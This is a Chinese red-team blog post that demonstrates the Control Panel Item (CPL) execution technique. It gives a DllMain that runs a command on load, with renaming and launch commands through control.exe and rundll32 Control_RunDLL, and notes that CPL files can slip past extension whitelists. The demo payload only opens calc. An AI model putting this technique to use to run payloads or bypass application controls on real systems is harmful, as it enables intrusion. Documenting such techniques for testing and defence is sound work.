Control Panel Items

最新推荐文章于 2021-10-09 12:15:07 发布
最新推荐文章于 2021-10-09 12:15:07 发布
阅读量332 收藏
点赞数
分类专栏: Red Team
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44216796/article/details/112584707
版权

控制面板项目是注册的可执行文件(.exe) 或控制面板(.cpl) 文件,CPL实际上是重命名的动态链接库(.dlI) 文件,可导出CPIApplet函数。控制面板项可以直接从命令行执行,也可以通过Control_RunDLL (API)调用或者直接双击文件。

攻击者可以使用控制面板项目来执行任意命令。恶意控制面板项目可以通过钓鱼邮件投递,也可以作为多阶段恶意软件的一个执行方法。控制面板项目,尤其是CPL文件,也可能会绕过应用程序或文件扩展名白名单。

命令执行

vs编写DLL:https://blog.csdn.net/qq_30139555/article/details/103621955

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <windows.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        WinExec("cmd.exe /c calc", SW_SHOW);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

这里我们用VS将上述代码编译为dIl文件Dll1.dll(可以随意命名),然后将Dll1.dll重命名为CPIApplet.cpl

复现

命令行

control.exe D:\\Dll1.cpl #这里cpl的路径一定要采用绝对路径不然回报错

在这里插入图片描述

双击

在这里插入图片描述

使用导出函数Control_RunDLL

rundll32.exe shell32.dll,Control_RunDLL D:\\Dll1.cpl

在这里插入图片描述
注:执行的payload文件后缀名不一定是cpl,可以是任意后缀。

control.exe D:\\Dll1.test

在这里插入图片描述

AZ09WY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Panel控件
幸遇三杯酒好,况逢一朵花新
01-23 6198
今天小编来给大家介绍一下panel控件;    首先来看一下panel控件是什么?    是什么:     Panel 控件提供了一种用于组织控件的分组机制。Panel 控件可被递归嵌套在 Form 控件(Panel 控件最外面的容器)中。面板呈现它本身包含的控件。     面板上设置的样式属性可被同一个面板上包含的其他控件继承。
win10设置java环境变量
miqi770的专栏
07-06 943
首先,win10得找到设置的入口:Control Panel\All Control Panel Items\System 找到advanced system settings
windows相关问题解决
miaoman123456的博客
06-10 324
序号 功能 方法 1 git bash密码 很多时候我们容易在Git Bash操作的时候,不慎输入错误的用户名或密码,此时一直提示: remote: Incorrect username or password ( access token ) 解决办法: 1.打开控制面板(快捷打开win+R,输入contr...
Windows 8 去除微软拼音,直接使用第三方输入法
Fany的专栏
08-26 830
设置的位置在Control Panel\All Control Panel Items\Language Add a language加入English 删除中文 重新安装搜狗输入法或其它输入法即可
Windows 10/11离线安装.NET Framework 3.5
davidyezhiwei的博客
10-09 2万+
打开Control Panel\All Control Panel Items\Programs and Features 点击Turn Windows features on or off,显示.NET Framework 3.5 (includes .Net 2.0 and 3.0)未安装;可以选择打勾点OK后联网安装,也可以使用以下方式离线安装 下载Windows 10/11镜像,可通过刻录好的系统重装盘(U盘/光盘)或直接镜像解压路径安装.NET Framework 3.5 (inclu
Remove useless item form the Control Panel\All Control Panel Items
weixin_30546933的博客
07-16 264
Some time the useless item will keep in this Panel, even though we have uninstalled the corresponding software, such as the CinePlayer in this case. I tried to search the corresponding registry in ...
WIN7下通过命令调用“控制面板项” /   RUNDLL32详解 / CPL文件详解
weixin_34015860的博客
12-02 1483
CPL文件CPL文件,又叫控制面板项(Control Panel Item),多保存于系统安装目录的system32文件夹下,它们分别对应着控制面板中的项目,普通用户的访问受到限制。它可由shell32.dll、control.exe打开。此外,你也可以直接在资源管理器中双击调用Open命令打开(实质上调用了shell32.dll)。CPL文件本质是Windows可执行性文件...
WinForm自定义下拉列表框用户控件
10-11
2. **设计控件界面**:在设计器中,添加必要的基本控件,如TextBox用于显示选中的选项,Panel用于显示下拉列表,以及可能的其他自定义组件。 3. **编写代码逻辑**:在代码编辑器中,实现控件的逻辑功能,包括但不...
C++获取CPL系统控制面板信息
05-16
在C++编程中,获取CPL(Control Panel Items,控制面板项)系统控制面板信息是一项实用的功能,尤其对于开发需要与系统集成的应用程序而言。CPL是Windows操作系统中用于访问和管理用户设置的一系列小程序。以下是...
Windows7系统提速8个技巧.docx
07-05
进入控制面板的字体文件夹(Control Panel\All Control Panel Items\Fonts),移除不常使用的字体到备份文件夹,或者直接卸载,以释放系统资源。 7. **加速任务栏预览**:在注册表中找到“HKEY_CURRENT_USER\...
ASP .NET Core API发布与部署以及遇到的坑和解决方法
12-16
最近在写.Net Core的API,由于之前没接触过Core,所以自己的... IIS Path–>Control Panel\All Control Panel Items\Programs and Features  没细致研究,全装了~ 二、发布API 1.选择File System,设置Target loc
win10专业版标准用户怎么改为管理员?.docx
09-27
在控制面板的“所有控制面板项”(All Control Panel Items)列表中,找到并点击“用户账户”(User Accounts)。 10. 在用户账户界面,选择“更改账户类型”(Change account type)选项,这将允许你修改账户的...
WPF ItemsControl深度解读之ItemsItemsSource
热门推荐
皮皮君的博客
04-12 3万+
    相信不少WPF开发者对控件有一些了解,摆脱了早期微软的MFC,发现WPF编程方式更加方便。但是仍然是浩如烟海般的资料需要了解。控件是WPF开发绕不开的话题。今天我们就从分析ItemsControl控件开始。    ItemsControl可以包含多个项,神奇的就在于它可以包含字符串或完全用户自己定义的类对象,甚至可以包含Button按钮、StackPanel控件,它是ListBox,Lis...
控制面板中点击管理工具提示administrative tools 位置不可用的解决办法
xinlingcheng的专栏
11-15 2万+
1 错误描述。 Win7操作系统下打开控制面板-〉系统和安全-〉管理工具时弹出如下错误框:    2 问题分析。 经检查发现文件夹C:\ProgramData\Microsoft\Windows\Start Menu\Programs不存在(我电脑上如此),查找资料得知文件夹C:\ProgramData\Microsoft\Windows\Start Menu\Prog
隐藏控制面板项_如何在Windows中从控制面板隐藏项目
culul01313的博客
09-09 1257
隐藏控制面板项The Windows Control Panel offers up a number ofsettings that you might not want some users messing around with. Here’s how to hide specific Control Panel appsin Windows 7, 8, and10. Windows...
Windows 10 控制面板 (Control Panel)
既然选择了远方 便只顾风雨兼程 - 永强
09-28 1万+
Windows 10 控制面板 (Control Panel)
Invoke-Obfuscation
weixin_44216796的博客
01-16 2377
导入项目: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 支持的加密功能列表 TOKEN支持分部分混淆 STRING整条命令混淆 COMPRESS将命令转为单行并压缩, ENCODING编码 LAUNCHER选择执行方式。 使用 set scriptpath C:\Users\Administrator\Desktop\payload.ps1 encoding 1 out x.ps1 powershell -windowsty
<ItemsControl x:Class="HDSProject.Control.CustomFont" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:d="http://schemas.microsoft.com/expression/blend/2008" xmlns:local="clr-namespace:HDSProject.Control" mc:Ignorable="d" d:DesignHeight="450" d:DesignWidth="800" x:Name="itemCtrl" ItemsSource="{Binding Path=Title2, RelativeSource={RelativeSource Mode=Self}}" FontSize="20" Foreground="Teal" > <ItemsControl.ItemsPanel> <ItemsPanelTemplate> <StackPanel Orientation="Horizontal"/> </ItemsPanelTemplate> </ItemsControl.ItemsPanel> <ItemsControl.ItemTemplate> <DataTemplate> <Border Margin="{Binding Path=CharacterSpacing, RelativeSource={RelativeSource Mode=FindAncestor, AncestorType=local:CustomFont}}"> <TextBlock Text="{Binding}" /> </Border> </DataTemplate> </ItemsControl.ItemTemplate> </ItemsControl>用Line控件在文字下方添加下划线
最新发布
06-06
<ItemsControl.ItemsPanel> </ItemsControl.ItemsPanel> , RelativeSource={RelativeSource Mode=FindAncestor, AncestorType=local:CustomFont}}"/> , ElementName=tb}" Y2="0" Stroke="Teal" ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值